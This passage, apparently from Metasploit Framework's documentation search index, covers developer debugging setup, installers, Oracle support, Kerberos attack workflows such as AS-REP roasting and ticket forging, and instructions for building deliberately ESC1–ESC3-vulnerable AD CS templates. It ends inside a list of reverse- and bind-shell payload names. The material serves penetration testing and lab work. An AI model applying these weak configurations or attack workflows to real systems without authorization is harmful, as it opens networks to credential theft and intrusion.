    "url": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#rubymine-code-navigation",
    "relUrl": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#rubymine-code-navigation"
  },"697": {
    "doc": "Navigating the codebase",
    "title": "SolarGraph Code Navigation - VSCode",
    "content": "We’d be remiss to not mention SolarGraph as a potential plugin that one can use to navigate code within VSCode. This tool provides a lot of the autocomplete and IntelliSense functionality you might get from dedicated IDEs such as RubyMine, within VSCode itself. The tool can be installed by running gem install solargraph-rails for the Rails integrations, which will also in turn install solargraph itself. If you just want SolarGraph without the Rails integrations, run gem install solargraph. The configuration file for SolarGraph itself can be found at .solargraph.yml within the root directory of Metasploit Framework. For more information on how this works and how to tweak it, please refer to https://solargraph.org/guides/configuration. Once the Gem files have been installed, the next step is to install the VSCode plugin. You can grab it from https://marketplace.visualstudio.com/items?itemName=castwide.solargraph. Once this is done, run the following commands to ensure that SolarGraph is using the most up to date information about your code: . bundle install # Update all the gems yard gems # Create documentation files for all the gems. SolarGraph relies on YARD for a lot of info. yard doc -c # Create YARD docs for all files and use the cache so we don't repeat work (-c option). solargraph bundle # Update Solargraph documentation for bundled gems . Then close down VSCode and restart it again, opening up the metasploit-framework directory again as a project if needs be. This should result in the SolarGraph server starting and then taking a few minutes to index your files. Note that this process may occur every time you open up the metasploit-framework project. This is normal and to be expected. If you’d like to save yourself some time, you can have YARD automatically generate new documentation for installed Gems by running yard config --gem-install-yri which will configure YARD to automatically generate documentation whenever new Gems are installed. ",
    "url": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#solargraph-code-navigation---vscode",
    "relUrl": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#solargraph-code-navigation---vscode"
  },"698": {
    "doc": "Navigating the codebase",
    "title": "Debugging Metasploit",
    "content": " ",
    "url": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#debugging-metasploit",
    "relUrl": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#debugging-metasploit"
  },"699": {
    "doc": "Navigating the codebase",
    "title": "Pry Debugging",
    "content": "Occasionally, simply reading through Metasploit code may not be helpful. You need to actually get into the weeds and learn what a piece of code is doing. In these cases, it may be helpful to use pry, a Ruby Debugger that can be launched at a specific place within your code and which allows you to view the state of the program at that time, make adjustments as needed, and then either step through the program or continue to let it run. You can enter into an interactive debugging environment using pry by adding the following code snippet within your Metasploit module or library method: . require 'pry'; binding.pry . Pry includes inbuilt commands for code navigation: . | backtrace: Show the current call stack | up / down: Navigate the call stack | step: Move forward by a single execution step | next: Move forward by a single line | whereami: Show the current breakpoint location again | help: View all of the available commands and options | . Ruby’s runtime introspection can be used to view the available methods, classes, and variables within the current Ruby environment: . | self: To find out what the current object is | self.methods: Find all available methods | self.methods.grep /send/: Searching for a particular method that you’re interested in. This can be great to explore unknown APIs. | self.method(:connect).source_location: Find out which file, and which line, defined a particular method | self.class.ancestors: For complex modules, this can be useful to see what mixins a Metasploit module is currently using | . To learn more about Pry, we recommend reading GitLab’s guide at https://docs.gitlab.com/ee/development/pry_debugging.html. ",
    "url": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#pry-debugging",
    "relUrl": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#pry-debugging"
  },"700": {
    "doc": "Navigating the codebase",
    "title": "Debug.gem Debugging",
    "content": "Ruby 3.1 and later come with debug.gem installed automatically, which is the new default debugger for Ruby. It replaces the old lib/debug.rb library that was not actively being maintained and replaces it with a modern debugging library capable of performing many debugging actions with next to no impact on the performance of the debugged application. Whilst RubyMine does not support the debug.gem functionality, you can use VSCode to take advantage of debug.gem to get speedy debugging of Ruby scripts from within VSCode itself. Simply install the debugging plugin from https://marketplace.visualstudio.com/items?itemName=KoichiSasada.vscode-rdbg, then go to the Metasploit root directory, and if you have Bundler installed, run bundle install. This will bring in the latest version of the debug gem. Once this is all done, open the metasploit-framework folder from a cloned GitHub copy of Metasploit Framework in VSCode by using File-&amp;gt;Open Folder. Then click Run-&amp;gt;Add Configuration-&amp;gt;Ruby(rdbg). This will create a file at &amp;lt;metasploit root&amp;gt;/.vscode/launch.json. Replace the contents of this file with the contents of the file at https://github.com/rapid7/metasploit-framework/blob/master/external/vscode/launch.json. If you wish, you can optionally change the listening port from 55634 in the script to one of your choice. Finally click Run-&amp;gt;Start Debugging to start debugging Metasploit Framework using VSCode. This may cause a prompt to appear that looks like bundle exec ruby /home/tekwizz123/git/metasploit-framework/msfconsole. Confirm this looks okay and that you are using bundle exec ruby to execute msfconsole. If all looks good, hit the ENTER key to confirm. At this point you should see Metasploit Framework open up. If you want to prevent this prompt in the future then simply remove the \"askParameters\": true, line from launch.json. 
Once in a debugging session, debug.gem supports the same commands as Pry in may cases, so the commands listed in the Pry section above should work in the same manner. Additionally debug.gem also supports extra commands for things such as tracing data. For more details refer to the command list at https://github.com/ruby/debug#debug-command-on-the-debug-console which provides a detailed list of debug.gem’s supported commands. For more information on the VSCode rdbg plugin, refer to https://code.visualstudio.com/docs/languages/ruby and https://marketplace.visualstudio.com/items?itemName=KoichiSasada.vscode-rdbg. ",
    "url": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#debuggem-debugging",
    "relUrl": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#debuggem-debugging"
  },"701": {
    "doc": "Navigating the codebase",
    "title": "RubyMine Debugging",
    "content": "RubyMine comes with its own built in debugger that is based off of the old lib/debug.rb library in Ruby, however it has custom patches and modifications applied to it by the JetBrains team. To set it up, first clone the Git repository for Metasploit-Framework locally, then go File-&amp;gt;Open and click on the metasploit-framework folder to open it as a project. Once this is done, go to Run-&amp;gt;Edit Configurations and click the plus sign to add a new configuration. Select Ruby, and in the name field, enter a name that makes sense for you, such as Metasploit Debug. Under Ruby Script, enter the full path to msfconsole on your local machine. Finally, set the SDK to either Use Project SDK or select another Ruby SDK that RubyMine recognizes. You can add a Ruby SDK by going to File-&amp;gt;Settings-&amp;gt;Languages and Frameworks-&amp;gt;Ruby SDK and Gems and clicking the plus sign. ",
    "url": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#rubymine-debugging",
    "relUrl": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html#rubymine-debugging"
  },"702": {
    "doc": "Navigating the codebase",
    "title": "Navigating the codebase",
    "content": " ",
    "url": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html",
    "relUrl": "/docs/development/get-started/navigating-and-understanding-metasploits-codebase.html"
  },"703": {
    "doc": "Nightly Installers",
    "title": "Installing Metasploit on Linux / macOS",
    "content": "The following script invocation will import the Rapid7 signing key and setup the package for supported Linux and macOS systems: . curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb &amp;gt; msfinstall &amp;amp;&amp;amp; \\ chmod 755 msfinstall &amp;amp;&amp;amp; \\ ./msfinstall . Once installed, you can launch msfconsole as /opt/metasploit-framework/bin/msfconsole from a terminal window, or depending on your environment, it may already be in your path and you can just run it directly. On first run, a series of prompts will help you setup a database and add Metasploit to your local PATH if it is not already. These packages integrate into your package manager and can be updated with the msfupdate command, or with your package manager. On first start, these packages will automatically setup the database or use your existing database. Linux manual installation . Linux packages are built nightly for .deb (i386, amd64, armhf, arm64) and .rpm (64-bit x86) systems. Debian/Ubuntu packages are available at https://apt.metasploit.com and CentOS/Redhat/Fedora packages are located at https://rpm.metasploit.com. macOS manual installation . The latest OS X installer package can also be downloaded directly here: https://osx.metasploit.com/metasploitframework-latest.pkg, with the last 8 builds archived at https://osx.metasploit.com/. Simply download and launch the installer to install Metasploit Framework with all of its dependencies. ",
    "url": "/docs/using-metasploit/getting-started/nightly-installers.html#installing-metasploit-on-linux--macos",
    "relUrl": "/docs/using-metasploit/getting-started/nightly-installers.html#installing-metasploit-on-linux--macos"
  },"704": {
    "doc": "Nightly Installers",
    "title": "Installing Metasploit on Windows",
    "content": "Download the latest Windows installer or view older builds. To install, download the .msi package, adjust your Antivirus as-needed to ignore c:\\metasploit-framework and execute the installer by right-clicking the installer file and selecting “Run as Administrator”. The msfconsole command and all related tools will be added to the system %PATH% environment variable. Windows Anti-virus software flags the contents of these packages! . If you downloaded Metasploit from us, there is no cause for alarm. We pride ourselves on offering the ability for our customers and followers to have the same toolset that the hackers have so that they can test systems more accurately. Because these (and the other exploits and tools in Metasploit) are identical or very similar to existing malicious toolsets, they can be used for nefarious purposes, and they are often flagged and automatically removed by antivirus programs, just like the malware they mimic. Windows silent installation . The PowerShell below will download and install the framework, and is suitable for automated Windows deployments. Note that, the installer will be downloaded to $DownloadLocation and won’t be deleted after the script has run. [CmdletBinding()] Param( $DownloadURL = \"https://windows.metasploit.com/metasploitframework-latest.msi\", $DownloadLocation = \"$env:APPDATA/Metasploit\", $InstallLocation = \"C:\\Tools\", $LogLocation = \"$DownloadLocation/install.log\" ) If(! (Test-Path $DownloadLocation) ){ New-Item -Path $DownloadLocation -ItemType Directory } If(! (Test-Path $InstallLocation) ){ New-Item -Path $InstallLocation -ItemType Directory } $Installer = \"$DownloadLocation/metasploit.msi\" Invoke-WebRequest -UseBasicParsing -Uri $DownloadURL -OutFile $Installer &amp;amp; $Installer /q /log $LogLocation INSTALLLOCATION=\"$InstallLocation\" . ",
    "url": "/docs/using-metasploit/getting-started/nightly-installers.html#installing-metasploit-on-windows",
    "relUrl": "/docs/using-metasploit/getting-started/nightly-installers.html#installing-metasploit-on-windows"
  },"705": {
    "doc": "Nightly Installers",
    "title": "Improving these installers",
    "content": "Feel free to review and help improve the source code for our installers. ",
    "url": "/docs/using-metasploit/getting-started/nightly-installers.html#improving-these-installers",
    "relUrl": "/docs/using-metasploit/getting-started/nightly-installers.html#improving-these-installers"
  },"706": {
    "doc": "Nightly Installers",
    "title": "Nightly Installers",
    "content": "Installers are built nightly for macOS, Windows (64-bit) and Linux. These installers include dependencies (like Ruby and PostgreSQL) and integrate with your package manager, so they’re easy to update. ",
    "url": "/docs/using-metasploit/getting-started/nightly-installers.html",
    "relUrl": "/docs/using-metasploit/getting-started/nightly-installers.html"
  },"707": {
    "doc": "Oracle Usage",
    "title": "Install oracle InstantClient",
    "content": "InstantClient 10 is recommended to allow you to talk with 8,9,10,&amp;amp;11 server versions. Go to https://www.oracle.com/database/technologies/instant-client/downloads.html and select the link corresponding to your UNIX PC’s architecture. Example for Linux x64, use the Instant Client for Linux x86-64 link, which should take you to https://www.oracle.com/database/technologies/instant-client/linux-x86-64-downloads.html . Grab these: . | Instant Client Package - Basic | Instant Client Package - SDK (devel) | Instant Client Package - SQL*Plus (not needed for Metasploit but useful to have) | . unzip into /opt/oracle . cd /opt/oracle unzip /opt/oracle/oracle-instantclient-basic-10.2.0.4-1.i386.zip unzip /opt/oracle/oracle-instantclient-sqlplus-10.2.0.4-1.i386.zip unzip /opt/oracle/oracle-instantclient-devel-10.2.0.4-1.i386.zip . Now set up a symlink so the gem installation can find the right lib: . ln -s libclntsh.so.10.1 libclntsh.so . ",
    "url": "/docs/using-metasploit/other/oracle-support/oracle-usage.html#install-oracle-instantclient",
    "relUrl": "/docs/using-metasploit/other/oracle-support/oracle-usage.html#install-oracle-instantclient"
  },"708": {
    "doc": "Oracle Usage",
    "title": "Set up your environment",
    "content": "You can either create .sh file to make the appropriate changes when you need it or just add it to your .bashrc . export PATH=$PATH:/opt/oracle/instantclient_10_2 export SQLPATH=/opt/oracle/instantclient_10_2 export TNS_ADMIN=/opt/oracle/instantclient_10_2 export LD_LIBRARY_PATH=/opt/oracle/instantclient_10_2 export ORACLE_HOME=/opt/oracle/instantclient_10_2 . ",
    "url": "/docs/using-metasploit/other/oracle-support/oracle-usage.html#set-up-your-environment",
    "relUrl": "/docs/using-metasploit/other/oracle-support/oracle-usage.html#set-up-your-environment"
  },"709": {
    "doc": "Oracle Usage",
    "title": "Additional steps for Kali Linux",
    "content": "If you are using Kali Linux, you need to perform a couple of additional steps before the Oracle client gem will build properly. First, set your path to prefer the correct version of ruby so that Metasploit can use it: . root@kali:~/ruby-oci8-ruby-oci8-2.1.8# export PATH=/opt/metasploit/ruby/bin:$PATH . Next, install libgmp (needed to build the gem): . root@kali:~/ruby-oci8-ruby-oci8-2.1.8# apt-get install libgmp-dev Reading package lists... Done Building dependency tree Reading state information... Done Suggested packages: libgmp10-doc libmpfr-dev The following NEW packages will be installed: libgmp-dev 0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded. Need to get 0 B/610 kB of archives. After this operation, 1,740 kB of additional disk space will be used. Selecting previously unselected package libgmp-dev:amd64. (Reading database ... 322643 files and directories currently installed.) Unpacking libgmp-dev:amd64 (from .../libgmp-dev_2%3a5.0.5+dfsg-2_amd64.deb) ... Setting up libgmp-dev:amd64 (2:5.0.5+dfsg-2) ... ",
    "url": "/docs/using-metasploit/other/oracle-support/oracle-usage.html#additional-steps-for-kali-linux",
    "relUrl": "/docs/using-metasploit/other/oracle-support/oracle-usage.html#additional-steps-for-kali-linux"
  },"710": {
    "doc": "Oracle Usage",
    "title": "Install the gem",
    "content": "Back in your Metasploit directory, copy Gemfile.local.example to Gemfile.local, then add the following line to the :local group . gem 'ruby-oci8' . Update gems: . bundle --gemfile Gemfile.local . ",
    "url": "/docs/using-metasploit/other/oracle-support/oracle-usage.html#install-the-gem",
    "relUrl": "/docs/using-metasploit/other/oracle-support/oracle-usage.html#install-the-gem"
  },"711": {
    "doc": "Oracle Usage",
    "title": "Oracle Usage",
    "content": " ",
    "url": "/docs/using-metasploit/other/oracle-support/oracle-usage.html",
    "relUrl": "/docs/using-metasploit/other/oracle-support/oracle-usage.html"
  },"712": {
    "doc": "Overview",
    "title": "What is Kerberos?",
    "content": "Kerberos is an authentication protocol. In response to a client proving their identity, Kerberos generates tickets which can be used to further interact with systems as a proof of identity. Kerberos is not used for authorization. NTLM is an alternative authentication protocol implemented in Microsoft Products. The difference between authentication and authorization is: . | Authentication - Verification of identity | Authorization - Verification of access rights. This takes place after authentication. | . Kerberos can be found on the following ports: . | 88/TCP - More frequently used, and supported by Metasploit | 88/UDP - Currently not supported by Metasploit | . Metasploit currently provides modules for requesting authentication tickets, forging tickets, exploitation, and more. ",
    "url": "/docs/pentesting/active-directory/kerberos/overview.html#what-is-kerberos",
    "relUrl": "/docs/pentesting/active-directory/kerberos/overview.html#what-is-kerberos"
  },"713": {
    "doc": "Overview",
    "title": "Core Concepts",
    "content": "Key Distribution Centre . The Key Distribution Centre consists of two parts: the Authentication Server (AS) and the Ticket Granting Server (TGS). The Authentication Server (AS) performs the client authentication process. Authentication is generally performed using a secret key such as the user’s password, but other methods exist, such as pkinit, which relies on public keys for authentication. If authentication is successful, the Authentication Server will return a new Ticket Granting Ticket (TGT). The Ticket Granting Server requires a user’s TGT and the details of the service that the user would like to access. The Service Tickets it issues are used for gaining access to services such as SMB/WinRM/etc. In most Kerberos pentesting tools, including Metasploit, the granted Service Tickets are called TGS. Service Principal Name . A Service Principal Name (SPN) is a forest-unique string. It associates a service with a service logon account. The SPN is set on a user or computer object via the AD Schema. Generally the SPN follows the format &amp;lt;service class&amp;gt;/&amp;lt;host&amp;gt;&amp;lt;realm&amp;gt;:&amp;lt;port&amp;gt;/&amp;lt;service name&amp;gt;. A service can have multiple SPNs. On a Windows Domain Controller you can view the available SPNs with the setspn -q */* command. Security identifiers . In the context of Microsoft’s Active Directory, Security Identifiers (SIDs) are used to uniquely identify users, groups, and computer accounts. This knowledge is required when using the auxiliary/admin/kerberos/forge_ticket module. An example of a SID is S-1-5-21-1266190811-2419310613-1856291569-500, which can be broken down as: . S-1-5-21 (SID prefix) 1266190811-2419310613-1856291569 (Domain Identifier) 500 (Relative ID - the Administrator account) . You can view SIDs on a domain controller with: . 
C:\\Users\\Administrator&amp;gt;wmic useraccount get name, sid Name SID Administrator S-1-5-21-1266190811-2419310613-1856291569-500 Guest S-1-5-21-1266190811-2419310613-1856291569-501 krbtgt S-1-5-21-1266190811-2419310613-1856291569-502 DefaultAccount S-1-5-21-1266190811-2419310613-1856291569-503 . ",
    "url": "/docs/pentesting/active-directory/kerberos/overview.html#core-concepts",
    "relUrl": "/docs/pentesting/active-directory/kerberos/overview.html#core-concepts"
  },"714": {
    "doc": "Overview",
    "title": "Authentication example",
    "content": "Below is an example authentication workflow in Kerberos for authenticating to an SMB service running on Windows: . | Step 1. Request TGT . | AS_REQ . | Generate the Kerberos encryption key from the user’s credentials | . | AS_REP . | Returned after the KDC verifies the encrypted timestamp | The client stores the TGT for later use when requesting service tickets | . | . | Step 2. Request Service Ticket . | TGS_REQ . | Use the TGT from Step 1 | Specify the required SPN (Service Principal Name), e.g. cifs/host.realm.local | . | TGS_REP . | Receive a new TGS which can be used with a service | . | . | Step 3. Interact with service . | AP_REQ . | Send the service ticket | . | AP_REP . | Success/Failure information | . | . | . sequenceDiagram participant msf as metasploit participant kdc as Kerberos participant smb as smb Note over msf,kdc: 1) Request Ticket Granting Ticket - TGT msf-&amp;gt;&amp;gt;kdc: AS_REQ&amp;lt;br &amp;gt;encKey = EncKeyFor(user, pass, realm)&amp;lt;br &amp;gt;sname = krbtgt/realm kdc-&amp;gt;&amp;gt;msf: AS_REP&amp;lt;br &amp;gt;TGT Note over msf,kdc: 2) Request Service Ticket - TGS msf-&amp;gt;&amp;gt;kdc: TGS_REQ&amp;lt;br&amp;gt;Ticket&amp;lt;br&amp;gt;spn=cifs/host.domain.local kdc-&amp;gt;&amp;gt;msf: TGS_REP&amp;lt;br&amp;gt;TGS Note over msf,kdc: 3) Request Service Access msf-&amp;gt;&amp;gt;smb: AP_REQ&amp;lt;br&amp;gt;Service Ticket smb-&amp;gt;&amp;gt;msf: AP_REP . ",
    "url": "/docs/pentesting/active-directory/kerberos/overview.html#authentication-example",
    "relUrl": "/docs/pentesting/active-directory/kerberos/overview.html#authentication-example"
  },"715": {
    "doc": "Overview",
    "title": "Common Kerberos workflows",
    "content": ". | User enumeration / bruteforcing - the auxiliary/scanner/kerberos/kerberos_login module can be used to enumerate user accounts or bruteforce credentials | AS-REP Roasting - Some Kerberos accounts may be configured with the Do not require Kerberos preauthentication flag. For these accounts a Kerberos TGT will be returned by the KDC without needing to authenticate. These TGTs can be bruteforced to learn the original user’s credentials. The auxiliary/scanner/kerberos/kerberos_login module implements this workflow. | Forging Tickets - After compromising a KDC or service account it is possible to forge tickets for persistence. The auxiliary/admin/kerberos/forge_ticket module can forge both Golden and Silver tickets. | Inspecting Tickets - Kerberos tickets can be inspected with the auxiliary/admin/kerberos/inspect_ticket module. If the encryption key is known, the decrypted contents can be displayed. | Service authentication - Using Kerberos to authenticate to services such as WinRM/Microsoft SQL Server/SMB/LDAP/etc | Kerberoasting - Finding services in Active Directory that are associated with normal user accounts, which may have brute-forceable encryption keys that lead to Active Directory credentials. | . ",
    "url": "/docs/pentesting/active-directory/kerberos/overview.html#common-kerberos-workflows",
    "relUrl": "/docs/pentesting/active-directory/kerberos/overview.html#common-kerberos-workflows"
  },"716": {
    "doc": "Overview",
    "title": "Overview",
    "content": " ",
    "url": "/docs/pentesting/active-directory/kerberos/overview.html",
    "relUrl": "/docs/pentesting/active-directory/kerberos/overview.html"
  },"717": {
    "doc": "Overview",
    "title": "What is AD CS?",
    "content": "Active Directory Certificate Services, also known as AD CS, is an Active Directory tool for letting administrators issue and manage public key certificates that can be used to connect to various services and principals on the domain. It is often used to provide certificates that can be used in place of credentials for logging into a network, or to provide certificates that can be used to sign and verify the authenticity of data. The main guarantees that AD CS aims to provide are: . | Confidentiality via encryption | Integrity via digital signatures | Authentication by associating certificate keys with computers, users, or device accounts on a computer network. | . Given that AD CS often holds highly sensitive keys and access credentials for a corporate network, this makes it a prime target for attackers. ",
    "url": "/docs/pentesting/active-directory/ad-certificates/overview.html#what-is-ad-cs",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/overview.html#what-is-ad-cs"
  },"718": {
    "doc": "Overview",
    "title": "Required Ports for AD CS",
    "content": "Active Directory requires the following ports be open on all domain controllers, which heavily overlaps with the ports required for AD CS: . | TCP/UDP port 53: DNS | TCP/UDP port 88: Kerberos authentication | TCP/UDP port 135: RPC | TCP/UDP port 137-138: NetBIOS | TCP/UDP port 389: LDAP | TCP/UDP port 445: SMB | TCP/UDP port 464: Kerberos password change | TCP/UDP port 636: LDAP SSL | TCP/UDP port 3268-3269: Global catalog | . AD CS additionally has the following requirements for Certificate Authorities: . | A random TCP port above 1023: RPC dynamic port allocation | . The following ports are optional depending on the services used, and tend to apply to Certificate Enrollment Web Services: . | TCP port 80: HTTP | TCP port 443: HTTPS | TCP port 445: SMB | . If using Active Directory Federation Services (ADFS) for single sign-on, the following ports are also required: . | TCP port 80: HTTP | TCP port 443: HTTPS | TCP port 49443: ADFS | . ",
    "url": "/docs/pentesting/active-directory/ad-certificates/overview.html#required-ports-for-ad-cs",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/overview.html#required-ports-for-ad-cs"
  },"719": {
    "doc": "Overview",
    "title": "Core Concepts",
    "content": "Microsoft provides a very useful training module that covers the fundamentals of AD CS, as well as examples which cover the management of certificate enrollment, certificate revocation and certificate trusts. ",
    "url": "/docs/pentesting/active-directory/ad-certificates/overview.html#core-concepts",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/overview.html#core-concepts"
  },"720": {
    "doc": "Overview",
    "title": "Setting up A Vulnerable AD CS Server",
    "content": "The following steps assume that you have installed AD CS on either a new or existing domain controller. Installing AD CS . | Open the Server Manager | Select Add roles and features | Select “Active Directory Certificate Services” under the “Server Roles” section | When prompted add all of the features and management tools | On the AD CS “Role Services” tab, leave the default selection of only “Certificate Authority” | Complete the installation and reboot the server | Reopen the Server Manager | Go to the AD CS tab and where it says “Configuration Required”, hit “More” then “Configure Active Directory Certificate…” | Select “Certificate Authority” in the Role Services tab | Select “Enterprise CA” in the “Setup Type” tab (the user must be a Domain Administrator for this option to be available) | Keep all of the default settings, noting the value of the “Common name for this CA” on the “CA Name” tab (this value corresponds to the CA datastore option) | Accept the rest of the default settings and complete the configuration | . Setting up an ESC1 Vulnerable Certificate Template . | Open up the run prompt and type in certsrv. | In the window that appears you should see your list of certification authorities under Certification Authority (Local). Right click on the folder in the drop down marked Certificate Templates and then click Manage. | Scroll down to the User certificate. Right click on it and select Duplicate Template. | From here you can refer to the following Active-Directory-Certificate-Services-abuse documentation for screenshots. | Select the General tab and rename this to something meaningful like ESC1-Template, then click the Apply button. | In the Subject Name tab, select Supply in the request and click Ok on the security warning that appears. Then click the Apply button. | Scroll to the Extensions tab and under Application Policies ensure that Client Authentication, Server Authentication, KDC Authentication, or Smart Card Logon is listed. Then click the Apply button. | Under the Security tab make sure that the Domain Users group is listed and the Enroll permission is marked as allowed for this group. | Under the Issuance Requirements tab, ensure that under Require the following for enrollment the CA certificate manager approval box is unticked, as is the This number of authorized signatures box. | Click Apply and then Ok | Go back to the certsrv screen and right click on the Certificate Templates folder. Then click New followed by Certificate Template to Issue. | Scroll down and select the ESC1-Template certificate, or whatever you named the ESC1 template you created, and select OK. The certificate should now be available to be issued by the CA server. | . Setting up an ESC2 Vulnerable Certificate Template . | Open up certsrv | Scroll down to the Certificate Templates folder, right click on it and select Manage. | Find the ESC1 certificate template you created earlier and right click on that, then select Duplicate Template. | Select the General tab, and then name the template ESC2-Template. Then click Apply. | Go to the Subject Name tab, select Build from this Active Directory Information and select Fully distinguished name under the Subject Name Format. The point of this setting is to prevent the subject name from being supplied in the request, since that is what makes a template vulnerable to ESC1 rather than ESC2. The specific options chosen here should not matter much so long as the Supply in the request option is not ticked. Then click Apply. | Go to the Extensions tab and click on Application Policies. Then click on Edit. | Delete all the existing application policies by clicking on them one by one and clicking the Remove button. | Click the Add button and select Any Purpose from the list that appears. Then click the OK button. | Click the Apply button, and then OK. The template should now be created. | Go back to the certsrv screen and right click on the Certificate Templates folder. Then click New followed by Certificate Template to Issue. | Scroll down and select the ESC2-Template certificate, or whatever you named the ESC2 template you created, and select OK. The certificate should now be available to be issued by the CA server. | . Setting up an ESC3 Template 1 Vulnerable Certificate Template . | Follow the instructions above to duplicate the ESC2 template and name it ESC3-Template1, then click Apply. | Go to the Extensions tab, click the Application Policies entry, click the Edit button, and remove the Any Purpose policy and replace it with Certificate Request Agent, then click OK. | Click Apply. | Go to the Issuance Requirements tab and double check that both CA certificate manager approval and This number of authorized signatures are unchecked. | Click Apply if any changes were made or the button is not greyed out, then click OK to create the template. | Go back to the certsrv screen and right click on the Certificate Templates folder. Then click New followed by Certificate Template to Issue. | Scroll down and select the ESC3-Template1 certificate, or whatever you named the first ESC3 template you just created, and select OK. The certificate should now be available to be issued by the CA server. | . Setting up an ESC3 Template 2 Vulnerable Certificate Template . | Follow the instructions above to duplicate the ESC2 template and name it ESC3-Template2, then click Apply. | Go to the Extensions tab, click the Application Policies entry, click the Edit button, and remove the Any Purpose policy and replace it with Client Authentication, then click OK. | Click Apply. | Go to the Issuance Requirements tab and double check that CA certificate manager approval is unchecked. | Check the This number of authorized signatures checkbox and ensure the value specified is 1, that the Policy type required in signature is set to Application Policy, and that the Application policy value is Certificate Request Agent. | Click Apply and then click OK to create the template. | Go back to the certsrv screen and right click on the Certificate Templates folder. Then click New followed by Certificate Template to Issue. | Scroll down and select the ESC3-Template2 certificate, or whatever you named the second ESC3 template you just created, and select OK. The certificate should now be available to be issued by the CA server. | . ",
    "url": "/docs/pentesting/active-directory/ad-certificates/overview.html#setting-up-a-vulnerable-ad-cs-server",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/overview.html#setting-up-a-vulnerable-ad-cs-server"
  },"721": {
    "doc": "Overview",
    "title": "Overview",
    "content": " ",
    "url": "/docs/pentesting/active-directory/ad-certificates/overview.html",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/overview.html"
  },"722": {
    "doc": "Payload Rename Justification",
    "title": "Payload Rename Justification",
    "content": "The Issue . Many payloads perform the same task, yet have different names. This results in confusion and a bad new-user experience. Specifically, ARCH_CMD payloads differ greatly from their shellcode-derived brethren. For example, the most heavily used payload is windows/meterpreter/reverse_tcp; the equivalent in ARCH_CMD land is cmd/unix/reverse, which gives no indication that the session type will be a shell. The Proposal . I propose we rename all the aberrantly-named payloads to match the convention. Specifically: . | cmd/unix/bind_awk -&amp;gt; cmd/unix/shell_bind_tcp_awk | cmd/unix/bind_lua -&amp;gt; cmd/unix/shell_bind_tcp_lua | cmd/unix/bind_netcat -&amp;gt; cmd/unix/shell_bind_tcp_netcat | cmd/unix/bind_netcat_gaping -&amp;gt; cmd/unix/shell_bind_tcp_netcat_gaping | cmd/unix/bind_netcat_gaping_ipv6 -&amp;gt; cmd/unix/shell_bind_tcp_netcat_gaping_ipv6 | cmd/unix/bind_nodejs -&amp;gt; cmd/unix/shell_bind_tcp_nodejs | cmd/unix/bind_perl -&amp;gt; cmd/unix/shell_bind_tcp_perl | cmd/unix/bind_perl_ipv6 -&amp;gt; cmd/unix/shell_bind_tcp_perl_ipv6 | cmd/unix/bind_ruby -&amp;gt; cmd/unix/shell_bind_tcp_ruby | cmd/unix/bind_ruby_ipv6 -&amp;gt; cmd/unix/shell_bind_tcp_ruby_ipv6 | cmd/unix/bind_zsh -&amp;gt; cmd/unix/shell_bind_tcp_zsh | cmd/unix/generic -&amp;gt; cmd/unix/exec | cmd/unix/reverse -&amp;gt; cmd/unix/shell_reverse_tcp_telnet | cmd/unix/reverse_awk -&amp;gt; cmd/unix/shell_reverse_tcp_awk | cmd/unix/reverse_bash -&amp;gt; cmd/unix/shell_reverse_tcp_bash | cmd/unix/reverse_bash_telnet_ssl -&amp;gt; cmd/unix/shell_reverse_tcp_bash_telnet_ssl | cmd/unix/reverse_lua -&amp;gt; cmd/unix/shell_reverse_tcp_lua | cmd/unix/reverse_netcat -&amp;gt; cmd/unix/shell_reverse_tcp_netcat | cmd/unix/reverse_netcat_gaping -&amp;gt; cmd/unix/shell_reverse_tcp_netcat_gaping | cmd/unix/reverse_nodejs -&amp;gt; cmd/unix/shell_reverse_tcp_nodejs | cmd/unix/reverse_openssl -&amp;gt; cmd/unix/shell_reverse_tcp_openssl | cmd/unix/reverse_perl -&amp;gt; 
cmd/unix/shell_reverse_tcp_perl | cmd/unix/reverse_perl_ssl -&amp;gt; cmd/unix/shell_reverse_tcp_perl_ssl | cmd/unix/reverse_php_ssl -&amp;gt; cmd/unix/shell_reverse_tcp_php_ssl | cmd/unix/reverse_python -&amp;gt; cmd/unix/shell_reverse_tcp_python | cmd/unix/reverse_python_ssl -&amp;gt; cmd/unix/shell_reverse_tcp_python_ssl | cmd/unix/reverse_ruby -&amp;gt; cmd/unix/shell_reverse_tcp_ruby | cmd/unix/reverse_ruby_ssl -&amp;gt; cmd/unix/shell_reverse_tcp_ruby_ssl | cmd/unix/reverse_ssl_double_telnet -&amp;gt; cmd/unix/shell_reverse_tcp_ssl_double_telnet | cmd/unix/reverse_zsh -&amp;gt; cmd/unix/shell_reverse_tcp_zsh | cmd/windows/bind_lua -&amp;gt; cmd/windows/shell_bind_tcp_lua | cmd/windows/bind_perl -&amp;gt; cmd/windows/shell_bind_tcp_perl | cmd/windows/bind_perl_ipv6 -&amp;gt; cmd/windows/shell_bind_tcp_perl_ipv6 | cmd/windows/bind_ruby -&amp;gt; cmd/windows/shell_bind_tcp_ruby | cmd/windows/download_eval_vbs -&amp;gt; cmd/windows/download_eval_vbs | cmd/windows/download_exec_vbs -&amp;gt; cmd/windows/download_exec_vbs | cmd/windows/generic -&amp;gt; cmd/windows/exec | cmd/windows/reverse_lua -&amp;gt; cmd/windows/shell_reverse_tcp_lua | cmd/windows/reverse_perl -&amp;gt; cmd/windows/shell_reverse_tcp_perl | cmd/windows/reverse_ruby -&amp;gt; 